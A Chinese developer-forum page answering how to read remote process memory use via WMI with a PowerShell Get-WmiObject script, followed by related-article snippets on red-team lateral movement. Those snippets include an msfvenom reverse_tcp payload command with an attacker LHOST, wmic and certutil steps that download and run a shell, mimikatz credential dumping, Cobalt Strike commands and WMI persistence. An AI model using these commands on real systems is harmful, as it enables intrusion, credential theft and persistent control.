开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

获取使用WMI在远程计算机上运行的进程的当前内存利用率

获取使用WMI在远程计算机上运行的进程的当前内存利用率是一个关于Windows系统中的Windows Management Instrumentation (WMI)的问题。WMI是一个用于管理和监视Windows系统的工具，它可以让你远程访问和管理系统的各种组件和服务。

在Windows系统中，可以使用WMI来获取远程计算机上运行的进程的内存利用率。这可以通过查询WMI的Win32_Process类来实现。以下是一个使用PowerShell脚本获取远程计算机上运行的进程的内存利用率的示例：

$computerName = "RemoteComputerName"
$username = "RemoteComputerUsername"
$password = "RemoteComputerPassword"

$credentials = New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString $password -AsPlainText -Force))

$wmi = Get-WmiObject -Class Win32_Process -ComputerName $computerName -Credential $credentials

foreach ($process in $wmi) {
    Write-Host "Process Name: $($process.Name) - Memory Usage: $($process.WorkingSetSize / 1MB) MB"
}

在这个示例中，我们使用Get-WmiObject命令来获取远程计算机上的Win32_Process类的实例。然后，我们遍历这些实例，并计算每个进程的内存利用率。最后，我们将进程名称和内存使用情况输出到控制台。

需要注意的是，使用WMI来获取远程计算机上的进程信息需要远程计算机的网络连接和适当的权限。此外，WMI可能会受到防火墙和安全策略的影响，因此在使用WMI时需要注意这些因素。

相关搜索:使用Python获取服务在远程计算机上运行的状态使用Wmi win32_Process进行远程进程执行 - 获取进程的标准输出如何使用远程主机上的现有用户在该计算机上运行命令使用用户名获取远程计算机的正在运行的进程应用程序退出后在计算机上运行的进程 Win7和Win10 OS计算机上Outlook进程的虚拟内存利用率使用Jupyter远程运行，而不复制远程计算机上的文件(脚本除外)无法获取正在远程计算机上运行的python脚本的正确退出值检查进程是否在多台远程计算机上运行，如果进程未运行，则复制一个文件，保存成功的计算机列表使用Fabric的run命令在远程计算机上运行python脚本时出错如何使用powershell获取远程计算机上的Caps Lock状态如何使用PowerShell获取远程计算机的空闲物理内存在MacOS上计算每个进程的内存使用量如何使用批处理文件计算当前运行的具有相同名称的进程数量在另一台计算机上运行的python脚本的远程控制功能无法连接到在不同计算机上的容器上运行的远程mySQL数据库如何获取在另一台计算机上运行的作业的状态？尝试在MinGW的C++上获取当前进程内存大小时出错如何使用C/C++系统调用获取Linux进程的堆内存的当前大小？如何从VSCode附加到在另一台计算机上运行的进程？

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

ATT&CK视角下的红蓝对抗:二十三.横向移动之利用WMI进行横向渗透

用户利用WMI可以轻松地与系统各类资源进行交互，如打开指定进程、远程启动计算机、设定指定程序在指定时间运行、查询Windows日志等。我们可以把它当作API来与Windows系统进行相互交流。...在渗透测试的过程中，WMI的价值就是不需要下载和安装，因为WMI是Windows系统自带的功能，而且整个运行过程都在计算机内存中进行，操作记录不会在Winodws日志中留存。...用户利用WMI可以轻松地与系统各类资源进行交互，如打开指定进程、远程启动计算机、设定指定程序在指定时间运行、查询Windows日志等。我们可以把它当作API来与Windows系统进行相互交流。...在渗透测试的过程中，WMI的价值就是不需要下载和安装，因为WMI是Windows系统自带的功能，而且整个运行过程都在计算机内存中进行，操作记录不会在Winodws日志中留存。...WMIC远程获取Shell 在攻击机上执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.2 LPORT=10090 -f exe

5561 0

黑客(红队)攻防中内网环境下WMI的利用

通过这个模型，我们可以方便地从远程计算机获取管理数据，也就是说，你可以在自己的电脑上查看和管理其他电脑的信息。...地址和IP地址WMIC远程获取shell 而前面也说了WMIC还有远程管理文件和操作计算机的功能，所以我们可以利用这一点去远程操纵计算机获取shell。 ...call create "cmd.exe"是要连接的远程计算机的名称或IP地址,是要使用的用户名，是对应的密码.这段命令的作用就是远程连接到...计算机的用户并且创建一个进程运行cmd.exe程序.而下一步就是将shell下载到目标计算机，这一步中我们需要在新的进程中下载certutil.exe...&& start test.exe 则表示在新进程执行完毕后启动test.exe程序。利用WMI进行域横向看完前面的操作相信师傅们也大致对WMI进行横向渗透也有了一定的思路。

2150 0

从远程计算机获取WMI数据

---- 您可以使用本主题中的过程和代码示例来创建完整的WMI客户端应用程序，该应用程序执行COM初始化，连接到远程计算机上的WMI，半同步获取数据，然后清理。...从远程计算机获取WMI数据通过调用CoInitializeEx初始化COM参数。通过调用CoInitializeSecurity初始化COM进程安全性。...通过调用IWbemLocator :: ConnectServer获得远程计算机上\\ root \ cimv2命名空间的指向IWbemServices的指针。...另外，请确保尝试连接到远程计算机的计算机上的用户名在远程计算机上具有正确的访问特权。创建一个COAUTHIDENTITY结构，以提供用于设置代理安全性的凭据。...这允许使用IEnumWbemClassObject接口半同步地检索来自查询的数据对象。设置IEnumWbemClassObject枚举器代理安全性。使用完凭据后，请确保从内存中删除它们。

2.2K1 0

红队技巧-常规横向手法

，通过它可以访问、配置、管理和监视几乎所有的Windows资源，比如用户可以在远程计算机器上启动一个进程；设定一个在特WMI允许脚本语言（例如VBScript或Windows PowerShell）在本地和远程管理...我们可以利用一个非常著名的WMI类，Win32_Process，可通过利用来生成（远程）进程执行命令。...)（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法，就像使用基于DCERPC的DCOM协议在本地计算机上的对象一样，有关每个COM（和DCOM）对象的标识，实现和配置的信息存储在注册表中...在powershell中我们可以使用 get-CimInstance来列出本地COM程序列表远程DCOM对象的实例表现如下：客户端计算机从远程计算机请求实例化由CLSID表示的对象。...6.Outlook 在Outlook对象允许实例化和任意COM相互作用通过“创建对象”对象方法。这使攻击者可以与远程计算机上的COM对象进行交互，这些对象通常不会由DCOM公开。

2.1K2 0

内网环境下的横向移动总结

简单来讲，横向移动是指攻击者成功攻击一台计算机后，由该计算机横向跨越到另一台计算机，获取相关权限，进而窃取敏感信息的活动。...相比于Psexec，使用WMI执行远程命令基本不会在远程主机上留下日志，让黑客的行为显得更隐蔽。...利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM 使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法。...使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。

3.4K2 0

WMI技术介绍和应用——WMI概述

同时WMI技术一个非常大的优势就是可以访问远程计算机，对于远程计算机的访问，我将安排在最末节去介绍。 ...它是Windows操作系统中管理数据和操作的基础模块。我们可以通过WMI脚本或者应用程序去管理本地或者远程计算机上的资源。对于VC和汇编程序员，想获取诸如CPU序列号和硬盘序列号等信息是非常容易的。...它提供了一个通过操作系统、网络和企业环境去管理本地或远程计算机的统一接口集。应用程序和脚本语言使用这套接口集去完成任务，而不是直接通过Windows API。...这些WMI的使用者，可以查询、枚举数据，也可以运行Provider的方法，还可以向WMI订阅消息。当然这些数据操作都是要有相应的Provider来提供。...如果请求的是一个静态数据，WMI将从WMI存储库中查找数据并返回；如果请求的是一个动态数据，比如一个托管对象的当前内存情况，WMI服务将请求传递给已经在WMI服务中注册的相应的WMI提供者。

2.5K2 0

域内横向移动分析及防御

192.168.1.10\c$ （2）tasklist 在使用net use命令与远程目标机器建立ipc$后，可以使用tasklist命令列出远程主机上运行的进程 tasklist /S 192.168.1.10...，可以在远程计算机上执行命令，也可以将管理员权限提升到System权限以运行指定的程序可以在Windows server 2016 及以前使用下载地址：https://download.sysinternals.com.../files/PSTools.zip PsExec的基本原理是：通过管道在远程目标计算机上创建一个psexec服务，并在本地磁盘中生成一个名为“PSEXECSVC”的二进制文件，然后通过psexec服务运行命令...八、DCOM在远程系统中的使用 DCOM（Distributed Component Object Model，分布式组件对象模型）是微软的一系列概念和程序接口基于组件对象模型（COM），COM提供了一套允许在同一台计算机上的客户端和服务端之间进行通信的接口...（Win95及之后）客户端程序对象能够对网络中的另一台计算机上的服务器程序对象发送请求执行流程同样：通过ipc$连接远程计算机执行命令 1、通过本地DCOM执行命令获取DCOM程序列表： //

1.6K1 1

内网渗透测试：内网横向移动基础总结

通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码。 Mimikatz读取明文密码和hash也时最常用的方法。...\douser\Desktop\whoami.txt \\192.168.183.130\c$ 在使用net use命令与远程主机建立ipc$连接后，还可以使用tasklist命令的/S、/U、/P参数列出目标远程主机上运行的进程...此部分的更多详情请看我的文章：《内网横向移动：利用WMI来渗透》利用DCOM在远程机器中执行命令 DCOM（分布式组件对象模型）是微软基于组件对象模型（COM）的一些列概念和程序接口，COM提供了一套允许在同一台计算机上的客户端和服务器之间通信的接口...通过DCOM，客户端程序对象能够向网络中的另一台计算机上的服务器程序对象发送请求。下面通过一个实验来讲解如何使用DCOM在远程主机上面执行命令。...，攻击者的smbrelayx.py脚本上就会发现命令成功执行了：在实战中，我们会提前生成了一个 Metasploit 的 payload 并放置在当前目录下，然后用-e选项在目标主机上传并运行我们的payload

3.3K1 0

内网渗透的步骤_内网渗透思路

其中共享内存主要用于同一计算机内进程间通信，消息队列和管道主要用于分布式环境（通信进程位于通过网络连接的不同计算机）。...简单来说，咱们在cmd或者powershell中使用的命令行语言，就是WMI支持的，它提供给我们一个接口如powershell，便于我们管理计算机。...135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码...进程间通信（IPC）是在多任务操作系统或联网的计算机之间运行的程序和进程所用的通信技术。有两种类型的进程间通信（IPC）。...RPC开始是出现在Sun微系统公司和HP公司的运行UNⅨ操作系统的计算机中。简单来说，RPC就是用于支持远程IPC的连接。无论是本地连接还是远程连接，都要依托于VMI服务进行管理。

4.8K3 0

域渗透-横向移动命令总结

SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f #关闭“仅允许运行使用网络级别身份验证的远程桌面的计算机连接...的利用在横向移动时，测试人员可以利用WMI提供的管理功能，通过已获取的用户凭据，与本地或远程主机进行交互，并控制其执行各种行为。...目前有两种常见的利用方法：一是通过调用WMI的类方法进行远程执行，如Win32 Process类中的Create方法可以在远程主机上创建进程，Win32 Product类中的Install方法可以在远程主机上安装恶意的...MSI; 二是远程部署WMI事件订阅，在特定条的事件发生时触发攻击。...,指定远程主机的地址；/user,指定远程主机的用户名；/password,指定用户的密码 #通过调用Win32 Process.Create方法在远程主机上创建进程，启动CMD来执行系统命令，由于WMI

2.3K1 0

内网渗透 | 横向移动总结

使用如下命令： •-accepteula：第一次运行psexec会弹出确认框，使用该参数就不会弹出确认框•-u：用户名•-p：密码•-s：以system权限运行运程进程，获得一个system权限的交互式...利用这个接口，客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。DCOM是COM（组件对象模型）的扩展，它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。...DCOM 使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法。...使用DCOM进行横向移动的优势之一在于，在远程主机上执行的进程将会是托管COM服务器端的软件。...方法在远程主机上启动进程$com.DDEInitiate("cmd.exe","/c C:\shell.exe") 这里就不再列举其他方法了，这一部分因为知识储备的问题很多都是借鉴大佬们的思想，这里WHOAMI

3.8K2 0

PS常用命令之系统WMI查看和操作相关命令

人人都知道WMI能干很多事情，读取本机硬盘信息、读取远程计算机的用户信息、读取域用户信息等等。基本上你能想到的获取或者更改资源的操作它都能干。可谓吃得少干得多。它为什么这么能干呢？...当然也可以把一个大型系统建立在WMI以及WMI的提供程序之上 Q: WMI 可以做什么? 答: 通过使你的驱动程序成为 WMI 提供程序，你可以：使自定义数据可用于 WMI 使用者。...Core(TM) i5-4590 CPU @ 3.30GHz # SocketDesignation : SOCKET 0 Get-WmiObject -Class Win32_Process # 获取本地计算机上的进程...、操作 Get-WmiObject -Class Win32_Service -ComputerName 10.1.4.62 # 获取远程计算机上的服务 Get-WmiObject Win32_Service...-Filter "name='WinRM'" -ComputerName Server01).StopService() # 停止远程计算机上的WinRM服务，对该对象调用Win32_Service

1.4K1 0

WMI利用(横向移动)

2021 WMI利用（横向移动）谢公子学安全讲在前面作者：pingpig@深蓝攻防实验室上一篇文章我们简单的解释了什么是WMI，WMI做什么，为什么使用WMI。...本文是笔者在阅读国内部分的解释WMI横向移动的文章后写下的一篇文章，希望帮助同学们在攻防中进入横向移动后根据实际场景利用WMI来解决问题。...在横向移动中的固定过程中一定离不开“信息收集”，然后分析信息根据实际场景（工作组或者域）来进行横向移动，至于使用什么工具，为什么使用这个工具，笔者使用WMI的意见。...以及监听器在客户机上执行wmic命令，让指定的主机上线CS · payload generator 注意：测试下载时，可以自行使用Python开启WEB共享服务。...wmic命令，让指定机器上线CS · XSL 如下为普通的xsl恶意文件，我们可以在下例中修改Run()中的Payload，本地运行恶意程序或者远程使用Powershell亦或者其他下载命令等等，我们可以自行搭配

2.8K1 0

WMI使用技巧集

远程重启远程计算机？...除了 .NET 框架，还需要在计算机上安装 WMI 才能使用该命名空间中的管理功能。...例如，WMI 广泛利用 .NET 集合类并使用推荐的编码模式，如 .NET 异步操作的“委托”模式。因此，使用 .NET 框架的开发人员可以使用他们的当前技能访问有关计算机或应用程序的管理信息。...请参见使用 WMI 管理应用程序 | 检索管理对象的集合 | 查询管理信息 | 预订和使用管理事件 | 执行管理对象的方法 | 远程处理和连接选项 | 使用强类型对象获取CPU序列号代码 string...WMI最早出现在Microsoft Windows 2000系统上，但它同样可以安装在Windows NT 4和Windows 9x计算机上。WMI是一种轻松获取系统信息的强大工具。

8272 0

内网渗透基石篇--域内横向移动分析及防御

查看远程主机的C盘文件 2.tasklist命令查看远程主机上运行的进程 tasklist /S 192.168.160.135 /U HACKBIJI\Administrator /P W2ngluoanquan...3 计划任务 1.at命令 at是windows自带的用于创建计划任务的命令，使用at命令可以在远程目标上创建计划任务，建立定时任务四部曲如下：使用net time 命令确定远程机器当前的系统时间使用...在域环境中，用户登录计算机时使用的大都是域账号，大量计算机在安装使用相同的本地管理员账户和密码，因此，如果计算机的本地管理员账号和密码也是相同的，攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。...3 更新KB2871997补丁产生的影响微软在2014年5月发布了KB2871997.该补丁禁止通过本地管理员权限与远程计算机进行连接，其后果是，无法通过本地管理员权限对远程计算机使用psExee，...随后WMI会建立一个共享文件夹，用于远程读取命令执行结果。当用户输入命令时，WMI创建进程执行该命令，然后把结果输出到文件，这个文件位于之前创建的共享文件夹中。

2.9K6 2

服务器性能监视器_性能计数器感叹号

文章来源：http://blog.csdn.net/lhfzd2004/article/details/1722379 上一篇文章《服务器性能监控之WMI》介绍了通过远程com获取服务器性能（当然也可用于本地...打开管理工具–>性能，我们可以立即看到服务器的CPU，进程运行时间，磁盘容量等性能参数走势图。...获取CPU利用率 #region 获取CPU利用率 public static string getCpuUsage() …{ string used =...pc.NextValue().ToString(); return used; } #endregion 获取内存使用率 #region 获取内存使用率...，不过通过使用同样的方式，我们可以获取更多的性能以及进程运行的情况，但是要说明的一点是，所获取的数据必定是windows服务所提供的，当然我们也可以自己写一些windows服务，添加到系统performancecounter

7132 0

wmic命令解析与实例

WMI, 它是由一系列工具集组成的可以在本地或者远程管理计算机系统。...WMI 特点: WMI有一组API: 我们不管使用VBScript、PowerShell脚本还是利用C#的来访问WMI的类库，都是因为WMI向外暴露的一组API，通过调用API实现使用指定的类。...WMI有一个存储库: 尽管WMI的多数实例数据都不存储在WMI中，但是WMI确实有一个存储库，用来存放提供程序提供的类信息，或者称为类的蓝图或者Schema。...描述: 但是在WMIC出现之前如果要管理WMI系统必须使用一些专门的WMI应用，例如SMS或者使用WMI的脚本编程API，或者使用CIM Studio之类的工具。...process call create notepad.exe #在远程机器上创建新进程(值得利用) 会返回进程ID # 3.利用 wmic 实现远程下载后门 wmic /node:192.168.1.10

2.5K2 0

渗透测试神器CobaltStrike使用教程

在目标上内存中执行本地.NET程序 exit 退出beacon getprivs 对当前令牌启用系统权限...任务设置父PID ps 显示进程列表 psexec 使用服务在主机上生成会话 psexec_psh... 使用PowerShell在主机上生成会话 psinject 在特定进程中执行PowerShell命令 pth ...使用密钥连接远程主机 steal_token 从进程中窃取令牌 timestomp 将一个文件时间戳应用到另一个文件 ...使用mimikatz转储明文凭据 winrm 使用WinRM在主机上生成会话 wmi 使用WMI在主机上生成会话

3.9K2 0

初识(fileless malware)无文件非恶意软件

、WMI 简介 1）、WMI 是一项核心的 Windows 管理技术；用户可以使用 WMI 管理本地和远程计算机。...2）、WMI 提供有关本地或远程计算机状态的信息，并且可以用于配置安全设置，例如系统属性，用户组，调度进程或禁用错误日志记录 3）、WMI 的一个重要功能是能够使用 DCOM 或 WinRM 协议与远程计算机的...这使攻击者可以在远程计算机上远程操作 WMI 类，而无需事先在其上运行任何代码 0x02.2.2、使用 WMI 作为无文件非恶意软件的优点除了满足上面三点无文件非恶意软件流行的原因，使用 WMI 作为无文件非恶意软件还有如下优点...0x02.2.3、WMI 被用于无文件非恶意软件攻击的几个实例 1）、使用 Win32_Process 在本地或远程生成进程，等效于运行 psexec 的 wmi 2）、Wmi 事件权限维持 3）、著名无文件攻击病毒...NET 框架编写的程序在软件环境“通用语言运行时”中执行 3）、.NET 与几种编程语言一起使用，包括 C＃，VB.NET Shop，C ++和 F＃。

1.2K1 0

技术分享-持久性-WMI事件订阅

应该注意的是，WMI 事件作为 SYSTEM 运行，在重新启动后持续存在，并且需要管理员级别的权限才能使用此技术。 OF 托管对象格式 (MOF) 是用于描述 CIM（通用信息模型）类的语言。.../Metasploit.mof 在这种情况下，payload 是通过 Metasploit “ web_delivery/ ”模块使用 regsvr32 方法远程获取的。...Rahmat Nurfauzi开发了一个 PowerShell 脚本 ( WMI-Persistence )，它默认使用regsvr32方法执行任意命令，以便从远程服务器运行任意脚本。 ....有一个 PowerShell 模块可以通过在特定时间执行基于 64 编码的有效负载，在目标主机上部署 WMI 事件订阅的持久性技术。...“ wmi_updater ” 模块能够从远程位置获取有效负载，而不是将其存储在 WMI 存储库中。它将注册为“ AutoUpdater ”，并且可以在启动时或一天中的特定时间设置触发器。

2.8K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭